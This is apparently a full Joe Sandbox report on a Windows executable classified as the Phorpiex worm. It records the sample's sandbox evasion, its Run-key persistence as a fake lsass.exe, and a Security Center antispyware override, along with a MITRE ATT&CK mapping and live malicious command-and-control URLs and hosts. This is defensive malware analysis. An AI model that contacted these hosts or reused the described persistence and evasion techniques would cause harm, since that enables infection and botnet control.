Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Evaded block: after key decision	graph_0-6246
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Evaded block: after key decision	graph_0-6221
Source: C:\180771693628709\lsass.exe	Evaded block: after key decision	graph_5-6169

Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep			graph_0-6397
Source: C:\180771693628709\lsass.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep			graph_5-6391

Source: C:\Users\user\Desktop\6K1uYM85lS.exe	API coverage: 7.6 %
Source: C:\180771693628709\lsass.exe	API coverage: 2.3 %

Source: C:\180771693628709\lsass.exe TID: 5388	Thread sleep count: 258 > 30	Jump to behavior
Source: C:\180771693628709\lsass.exe TID: 5388	Thread sleep time: -51600s >= -30000s	Jump to behavior
Source: C:\180771693628709\lsass.exe TID: 5224	Thread sleep count: 1349 > 30	Jump to behavior
Source: C:\180771693628709\lsass.exe TID: 5224	Thread sleep time: -2698000s >= -30000s	Jump to behavior
Source: C:\180771693628709\lsass.exe TID: 5224	Thread sleep count: 7955 > 30	Jump to behavior
Source: C:\180771693628709\lsass.exe TID: 5224	Thread sleep time: -15910000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009B09F0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_009B09F0
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009B0B30 wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	0_2_009B0B30
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00780B30 wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	5_2_00780B30
Source: C:\180771693628709\lsass.exe	Code function: 5_2_007809F0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_007809F0

Source: lsass.exe, 00000006.00000002.2509417982.000000000147D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MSAFD L2CAP [Bluetooth]Hyper-V RAWRSVP UDPv6 Service Provider
Source: 6K1uYM85lS.exe, 00000000.00000002.2255091970.000000000153D000.00000004.00000020.00020000.00000000.sdmp, 6K1uYM85lS.exe, 00000000.00000002.2255091970.000000000150C000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000005.00000002.2426849925.000000000145D000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509392759.000000000146C000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2589532690.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: lsass.exe, 00000008.00000002.2589543390.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWMSAFD RfComm [Bluetooth]RSVP TCP Service Provider
Source: lsass.exe, 00000005.00000002.2426687670.0000000001424000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509309205.0000000001434000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2589394386.0000000000A35000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: lsass.exe, 00000005.00000002.2426915020.000000000147E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWRSVP UDP Service Provider

Source: C:\Users\user\Desktop\6K1uYM85lS.exe	API call chain: ExitProcess graph end node	graph_0-6155
Source: C:\Users\user\Desktop\6K1uYM85lS.exe	API call chain: ExitProcess graph end node	graph_0-6170
Source: C:\180771693628709\lsass.exe	API call chain: ExitProcess graph end node	graph_5-6155

Source: C:\Users\user\Desktop\6K1uYM85lS.exe

Code function: 0_2_009A9030 LoadLibraryA,GetProcAddress,

0_2_009A9030

Source: C:\Users\user\Desktop\6K1uYM85lS.exe

Code function: 0_2_009AFE60 CryptImportKey,CreateFileW,GetFileSize,CreateFileMappingA,MapViewOfFile,CryptCreateHash,GetProcessHeap,HeapAlloc,CryptHashData,CryptVerifySignatureA,memcpy,GetProcessHeap,HeapFree,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,CloseHandle,CryptDestroyKey,

0_2_009AFE60

Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: memset,GetLocaleInfoA,strcmp,		0_2_009B0240
Source: C:\180771693628709\lsass.exe	Code function: memset,GetLocaleInfoA,strcmp,		5_2_00780240

Source: C:\Users\user\Desktop\6K1uYM85lS.exe

Code function: 0_2_009A3C60 GetSystemTimeAsFileTime,

0_2_009A3C60

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\180771693628709\lsass.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiSpywareOverride

Jump to behavior

Remote Access Functionality

Yara detected Phorpiex

Source: Yara match	File source: Process Memory Space: 6K1uYM85lS.exe PID: 3200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 4596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 5308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 2884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 3320, type: MEMORYSTR

Source: C:\Users\user\Desktop\6K1uYM85lS.exe	Code function: 0_2_009A8E30 socket,setsockopt,htons,htonl,bind,listen,getsockname,htons,htons,closesocket,		0_2_009A8E30
Source: C:\180771693628709\lsass.exe	Code function: 5_2_00778E30 socket,setsockopt,htons,htonl,bind,listen,getsockname,htons,htons,closesocket,		5_2_00778E30

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	12 Native API	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	4 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 Data Encrypted for Impact	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	3 Clipboard Data	Exfiltration Over Bluetooth	22 Encrypted Channel	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	12 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	11 Non-Standard Port			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	111 Security Software Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	3 Non-Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Virtualization/Sandbox Evasion	LSA Secrets	1 Virtualization/Sandbox Evasion	SSH	Keylogging	Scheduled Transfer	14 Application Layer Protocol			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	1 Proxy			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Hidden Files and Directories	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
6K1uYM85lS.exe	72%	ReversingLabs	Win32.Worm.Phorpiex
6K1uYM85lS.exe	71%	Virustotal		Browse
6K1uYM85lS.exe	100%	Avira	HEUR/AGEN.1360733
6K1uYM85lS.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\180771693628709\lsass.exe	100%	Avira	HEUR/AGEN.1360733
C:\180771693628709\lsass.exe	100%	Joe Sandbox ML
C:\180771693628709\lsass.exe	72%	ReversingLabs	Win32.Worm.Phorpiex

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
gimmefile.top	11%	Virustotal	Browse
feedmefile.top	9%	Virustotal	Browse
api.wipmania.com	0%	Virustotal	Browse
gotsomefile.top	9%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://api.wipmania.com/UAMozilla/5.0	0%	Avira URL Cloud	safe
http://%sHTTP/1.0	0%	Avira URL Cloud	safe
http://api.wipmania.com/s	0%	Avira URL Cloud	safe
http://185.215.113.93/c1	100%	Avira URL Cloud	malware
http://185.215.113.93/c2	100%	Avira URL Cloud	malware
https://131.188.40.189:443/tor/status-vote/current/consensus.z	100%	Avira URL Cloud	malware
http://199.58.81.140/tor/status-vote/current/consensus.z	100%	Avira URL Cloud	malware
http://185.215.113.93/	100%	Avira URL Cloud	malware
http://149.56.45.200:9030/tor/server/fp/0077bcba7244db3e6a5ed2746e86170066684887+00d2ce3c2153ea09786f2105f26b138cf759424f+014326416058dcfd0965167026cbef647409a000+024a48d0eaff4761daa976248343c44f8223f4cc+02c0c261048dd34c4701de9b26748f18bf877d5c+035f813195f0cb9f567edfdf60c6745ca36ba0bd+04102613d8f998e956a7868d2de5a532ee2473ea+04dfe047acdf7a6620aca782fafc5ef1ae7f4754+0823ecb30ec0e634acf0b143127320a828258da8+08b9d6ba5b0e544ed1094a862130a9386cce682c+098f98538a21a16332e8c4b724305c2a3496a467+0a11c7546a1332412d1ebd13bd4c3d6a6644d7e0+0af982cc71a01d95e8959d763d0ec0e5a6c61244+0cf2f07ff0581ebbccdf209e655694358a98d816+0e5c4e180b8ad3260ff54cabbd50c6e80dc4a729+0f1c8168dfd0aadbe61bd71194d37c867fed5a21.z	0%	Avira URL Cloud	safe
http://www.48838389493.jo/	0%	Avira URL Cloud	safe
http://api.wipmania.com/	0%	Avira URL Cloud	safe
http://feedmefile.top/	100%	Avira URL Cloud	malware
http://86.59.21.38/tor/status-vote/current/consensus.z	100%	Avira URL Cloud	malware
http://7fv5nq57k4qvbrpt.onion/	0%	Avira URL Cloud	safe
http://199.58.81.140/tor/server/fp/02a0d8ddf4da4e601c1c66143bb0c8a0f2f3c857+02c0c261048dd34c4701de9b26748f18bf877d5c+04102613d8f998e956a7868d2de5a532ee2473ea+042bcdf2d36d7aee070e086dad4b57f27b2f1143+07da591e5bb420e5d6460ef146ef6a8776ef6ba5+083c52051140db8af770bd40c7c8883efff4caf3+08cd9d4224058dc97a1f27679a5bee5724c4c6ec+09a70e396de93f54d4541bbb0ec8e2b23761f34f+0c36ae99b744e32088c9ed23d7a31f8d23ae1a58+0c5cfd7cc30251555ac3a8b2f87e523430477fb1+0c68d484c72c44e8f1abef8637c156f69de8f08b+0d0a07d71e8229af56125b8bcb19ecb030b97133+0dc16feaa5a5e27a974009cbf7748bb6faae6de1+0eb05178de949d3e8eeec0bc02ed20ff0995f56c+0f35f5ddd162199b60b2d2cbc9bb7e35a084aff6+0f64a062eeb86ccfd243848263cd69b708bce805.z	0%	Avira URL Cloud	safe
http://api.wipmania.com/-	0%	Avira URL Cloud	safe
http://7fv5nq57k4qvbrpt.onion/C:	0%	Avira URL Cloud	safe
http://%sMozilla/5.0	0%	Avira URL Cloud	safe
http://%s:%hu/tor/status-vote/current/consensus.zdirectory-footer	0%	Avira URL Cloud	safe
http://193.11.164.243:9030/tor/status-vote/current/consensus.z	0%	Avira URL Cloud	safe
http://gimmefile.top/	100%	Avira URL Cloud	malware
http://gotsomefile.top/	100%	Avira URL Cloud	malware
http://127.0.0.1:%humsvcrt.dllsscanf_s_beginthreadexSecur32.dllInitSecurityInterfaceA200	0%	Avira URL Cloud	safe
http://127.0.0.1:%hu	0%	Avira URL Cloud	safe
http://%s:%hu/tor/server/fp/%s.z	0%	Avira URL Cloud	safe
http://api.wipmania.com/E	0%	Avira URL Cloud	safe
http://185.215.113.93/c6	100%	Avira URL Cloud	malware
http://www.48838389493.jo/f5d4s54s4sds5d5d5d3r3hr8h38h8h38f8hffw4tw84thw4h8th8w4h8t3rvr3r3bru3urbu3r	0%	Avira URL Cloud	safe
http://185.215.113.93/c5	100%	Avira URL Cloud	malware
http://7fv5nq57k4qvbrpt.onion/http://185.215.113.93/http://feedmefile.top/http://gotsomefile.top/htt	0%	Avira URL Cloud	safe
http://185.215.113.93/c4	100%	Avira URL Cloud	malware
http://185.215.113.93/c3	100%	Avira URL Cloud	malware
http://%s:%hu/tor/status-vote/current/consensus.z	0%	Avira URL Cloud	safe
http://%s:%hu/tor/server/fp/%s.zrouter	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.wipmania.com	127.0.0.1	true	true	0%, Virustotal, Browse	unknown
feedmefile.top	unknown	unknown	true	9%, Virustotal, Browse	unknown
gotsomefile.top	unknown	unknown	true	9%, Virustotal, Browse	unknown
gimmefile.top	unknown	unknown	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.93/c2	true	Avira URL Cloud: malware	unknown
http://185.215.113.93/c1	true	Avira URL Cloud: malware	unknown
https://131.188.40.189:443/tor/status-vote/current/consensus.z	false	Avira URL Cloud: malware	unknown
http://199.58.81.140/tor/status-vote/current/consensus.z	false	Avira URL Cloud: malware	unknown
http://149.56.45.200:9030/tor/server/fp/0077bcba7244db3e6a5ed2746e86170066684887+00d2ce3c2153ea09786f2105f26b138cf759424f+014326416058dcfd0965167026cbef647409a000+024a48d0eaff4761daa976248343c44f8223f4cc+02c0c261048dd34c4701de9b26748f18bf877d5c+035f813195f0cb9f567edfdf60c6745ca36ba0bd+04102613d8f998e956a7868d2de5a532ee2473ea+04dfe047acdf7a6620aca782fafc5ef1ae7f4754+0823ecb30ec0e634acf0b143127320a828258da8+08b9d6ba5b0e544ed1094a862130a9386cce682c+098f98538a21a16332e8c4b724305c2a3496a467+0a11c7546a1332412d1ebd13bd4c3d6a6644d7e0+0af982cc71a01d95e8959d763d0ec0e5a6c61244+0cf2f07ff0581ebbccdf209e655694358a98d816+0e5c4e180b8ad3260ff54cabbd50c6e80dc4a729+0f1c8168dfd0aadbe61bd71194d37c867fed5a21.z	false	Avira URL Cloud: safe	unknown
http://86.59.21.38/tor/status-vote/current/consensus.z	false	Avira URL Cloud: malware	unknown
http://199.58.81.140/tor/server/fp/02a0d8ddf4da4e601c1c66143bb0c8a0f2f3c857+02c0c261048dd34c4701de9b26748f18bf877d5c+04102613d8f998e956a7868d2de5a532ee2473ea+042bcdf2d36d7aee070e086dad4b57f27b2f1143+07da591e5bb420e5d6460ef146ef6a8776ef6ba5+083c52051140db8af770bd40c7c8883efff4caf3+08cd9d4224058dc97a1f27679a5bee5724c4c6ec+09a70e396de93f54d4541bbb0ec8e2b23761f34f+0c36ae99b744e32088c9ed23d7a31f8d23ae1a58+0c5cfd7cc30251555ac3a8b2f87e523430477fb1+0c68d484c72c44e8f1abef8637c156f69de8f08b+0d0a07d71e8229af56125b8bcb19ecb030b97133+0dc16feaa5a5e27a974009cbf7748bb6faae6de1+0eb05178de949d3e8eeec0bc02ed20ff0995f56c+0f35f5ddd162199b60b2d2cbc9bb7e35a084aff6+0f64a062eeb86ccfd243848263cd69b708bce805.z	false	Avira URL Cloud: safe	unknown
http://193.11.164.243:9030/tor/status-vote/current/consensus.z	false	Avira URL Cloud: safe	unknown
http://185.215.113.93/c6	true	Avira URL Cloud: malware	unknown
http://185.215.113.93/c5	true	Avira URL Cloud: malware	unknown
http://185.215.113.93/c4	true	Avira URL Cloud: malware	unknown
http://185.215.113.93/c3	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://api.wipmania.com/UAMozilla/5.0	6K1uYM85lS.exe, lsass.exe.0.dr	true	Avira URL Cloud: safe	unknown
http://%sHTTP/1.0	6K1uYM85lS.exe, lsass.exe.0.dr	false	Avira URL Cloud: safe	low
http://api.wipmania.com/s	lsass.exe, 00000008.00000002.2589351852.0000000000A12000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.93/	6K1uYM85lS.exe, lsass.exe.0.dr	true	Avira URL Cloud: malware	unknown
http://api.wipmania.com/	lsass.exe, 00000005.00000002.2426687670.0000000001424000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509379686.000000000145C000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509309205.0000000001434000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000002.2509290088.0000000001412000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000006.00000000.2450597790.0000000000785000.00000002.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000002.2509099309.0000000000785000.00000002.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589351852.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2589394386.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2589257665.0000000000785000.00000002.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589510100.0000000000A60000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.2532345540.0000000000785000.00000002.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.dr	true	Avira URL Cloud: safe	unknown
http://www.48838389493.jo/	lsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://feedmefile.top/	6K1uYM85lS.exe, lsass.exe.0.dr	true	Avira URL Cloud: malware	unknown
http://7fv5nq57k4qvbrpt.onion/	lsass.exe, 00000008.00000002.2589096829.00000000004FA000.00000004.00000010.00020000.00000000.sdmp, 6K1uYM85lS.exe, lsass.exe.0.dr	true	Avira URL Cloud: safe	unknown
http://api.wipmania.com/-	6K1uYM85lS.exe, 00000000.00000002.2255091970.000000000150C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://7fv5nq57k4qvbrpt.onion/C:	6K1uYM85lS.exe, 00000000.00000002.2254661523.00000000012FA000.00000004.00000010.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://%sMozilla/5.0	6K1uYM85lS.exe, lsass.exe.0.dr	false	Avira URL Cloud: safe	low
http://%s:%hu/tor/status-vote/current/consensus.zdirectory-footer	6K1uYM85lS.exe, lsass.exe.0.dr	false	Avira URL Cloud: safe	low
http://gimmefile.top/	6K1uYM85lS.exe, lsass.exe.0.dr	true	Avira URL Cloud: malware	unknown
http://gotsomefile.top/	6K1uYM85lS.exe, lsass.exe.0.dr	true	Avira URL Cloud: malware	unknown
http://127.0.0.1:%humsvcrt.dllsscanf_s_beginthreadexSecur32.dllInitSecurityInterfaceA200	6K1uYM85lS.exe, lsass.exe.0.dr	false	Avira URL Cloud: safe	low
http://127.0.0.1:%hu	lsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.dr	false	Avira URL Cloud: safe	low
http://%s:%hu/tor/server/fp/%s.z	lsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.dr	false	Avira URL Cloud: safe	low
http://api.wipmania.com/E	6K1uYM85lS.exe, 00000000.00000002.2255091970.000000000150C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.48838389493.jo/f5d4s54s4sds5d5d5d3r3hr8h38h8h38f8hffw4tw84thw4h8th8w4h8t3rvr3r3bru3urbu3r	6K1uYM85lS.exe, lsass.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://7fv5nq57k4qvbrpt.onion/http://185.215.113.93/http://feedmefile.top/http://gotsomefile.top/htt	6K1uYM85lS.exe, lsass.exe.0.dr	true	Avira URL Cloud: safe	unknown
http://%s:%hu/tor/status-vote/current/consensus.z	lsass.exe, lsass.exe, 00000005.00000000.2361258510.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000006.00000000.2450612893.0000000000789000.00000008.00000001.01000000.00000006.sdmp, lsass.exe, 00000008.00000002.2589269379.0000000000789000.00000008.00000001.01000000.00000006.sdmp, 6K1uYM85lS.exe, lsass.exe.0.dr	false	Avira URL Cloud: safe	low
http://%s:%hu/tor/server/fp/%s.zrouter	6K1uYM85lS.exe, lsass.exe.0.dr	false	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.56.44.47	unknown	Canada	16276	OVHFR	false
172.81.131.84	unknown	United States	27176	DATAWAGONUS	false
193.11.164.243	unknown	Sweden	1653	SUNETSUNETSwedishUniversityNetworkEU	false
157.90.77.166	unknown	United States	766	REDIRISRedIRISAutonomousSystemES	false
199.58.81.140	unknown	Canada	7765	KOUMBITCA	false
51.15.42.19	unknown	France	12876	OnlineSASFR	false
66.175.235.244	unknown	United States	8560	ONEANDONE-ASBrauerstrasse48DE	false
213.32.71.116	unknown	France	16276	OVHFR	false
130.185.250.214	unknown	Bulgaria	57344	TELEHOUSE-ASBG	false
107.189.8.226	unknown	United States	53667	PONYNETUS	false
86.59.21.38	unknown	Austria	8437	UTA-ASAT	false
178.170.10.3	unknown	France	21409	IKOULAFR	false
207.244.78.230	unknown	United States	30633	LEASEWEB-USA-WDCUS	false
149.56.45.200	unknown	Canada	16276	OVHFR	false
154.35.175.225	unknown	United States	14987	RETHEMHOSTINGUS	false
131.188.40.189	unknown	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false
95.217.42.50	unknown	Germany	24940	HETZNER-ASDE	false
185.215.113.93	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1372442
Start date and time:	2024-01-10 15:37:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	6K1uYM85lS.exe renamed because original name is a hash value
Original Sample Name:	8cd916321f1c8a63bd9fafb52a478ac65b3e86a33966bbfce60f5e46ffee6b8c.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/1@13/19
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 10 Number of non-executed functions: 113
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:38:12	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Host Process for Windows Services C:\180771693628709\lsass.exe
15:38:21	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Host Process for Windows Services C:\180771693628709\lsass.exe
15:38:29	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Host Process for Windows Services C:\180771693628709\lsass.exe
15:38:54	API Interceptor	6428848x Sleep call for process: lsass.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.11.164.243	SecuriteInfo.com.W32.MSIL_Kryptik.EWM.genEldorado.30775.exe	Get hash	malicious	Unknown	Browse	193.11.164.243:9030/tor/status-vote/current/consensus.z
	97238623.exe	Get hash	malicious	Unknown	Browse	193.11.164.243:9030/tor/server/fp/79509683ab4c8ddaf90a120c69a4179c6cd5a387+795790c25bde834b836ea54dd96db2610829573b+7961c9991f022c8a363fd440ca395d47db5d44d5.z
	t.exe	Get hash	malicious	Xmrig	Browse	193.11.164.243:9030/tor/status-vote/current/consensus.z
199.58.81.140	Bra6yVctsX.exe	Get hash	malicious	SystemBC	Browse	199.58.81.140/tor/status-vote/current/consensus
	x3WX1kHqcx.exe	Get hash	malicious	SystemBC	Browse	199.58.81.140/tor/status-vote/current/consensus
	iUoBt2SHML.exe	Get hash	malicious	SystemBC	Browse	199.58.81.140/tor/status-vote/current/consensus
	oGO7Hy4YCH.exe	Get hash	malicious	SystemBC	Browse	199.58.81.140/tor/status-vote/current/consensus
	iSyDaCjFVY.exe	Get hash	malicious	SystemBC	Browse	199.58.81.140/tor/status-vote/current/consensus
	F75rJPKdGb.exe	Get hash	malicious	Kronos	Browse	199.58.81.140/tor/status-vote/current/consensus
	lHCBcjZBib.exe	Get hash	malicious	Kronos	Browse	199.58.81.140/tor/status-vote/current/consensus
	KTi0r6xqtH.exe	Get hash	malicious	Kronos	Browse	199.58.81.140/tor/status-vote/current/consensus
	4i2nattkLT.exe	Get hash	malicious	Kronos	Browse	199.58.81.140/tor/status-vote/current/consensus
	F1MwWrwBR7.exe	Get hash	malicious	Kronos	Browse	199.58.81.140/tor/status-vote/current/consensus
	6729001591617.exe	Get hash	malicious	Kronos	Browse	199.58.81.140/tor/status-vote/current/consensus
	xLH4kwOjXR.exe	Get hash	malicious	Unknown	Browse	199.58.81.140/tor/status-vote/current/consensus
	osi.exe	Get hash	malicious	Kronos	Browse	199.58.81.140/tor/status-vote/current/consensus
	us6quGOhfX.exe	Get hash	malicious	Unknown	Browse	199.58.81.140/tor/status-vote/current/consensus
	taugif.exe	Get hash	malicious	Unknown	Browse	199.58.81.140/tor/status-vote/current/consensus
	hgJC8DQxr4.exe	Get hash	malicious	Unknown	Browse	199.58.81.140/tor/status-vote/current/consensus
	bill4759.doc	Get hash	malicious		Browse	199.58.81.140/tor/status-vote/current/consensus
	22FLJ9.js	Get hash	malicious		Browse	199.58.81.140/tor/status-vote/current/consensus

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OVHFR	https://bit.ly/3RPzJ7A	Get hash	malicious	Porn Scam	Browse	158.69.126.131
	https://nhp.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2Fpassword	Get hash	malicious	Unknown	Browse	51.68.39.188
	https://iplog.co/24FCf6	Get hash	malicious	Unknown	Browse	94.23.17.185
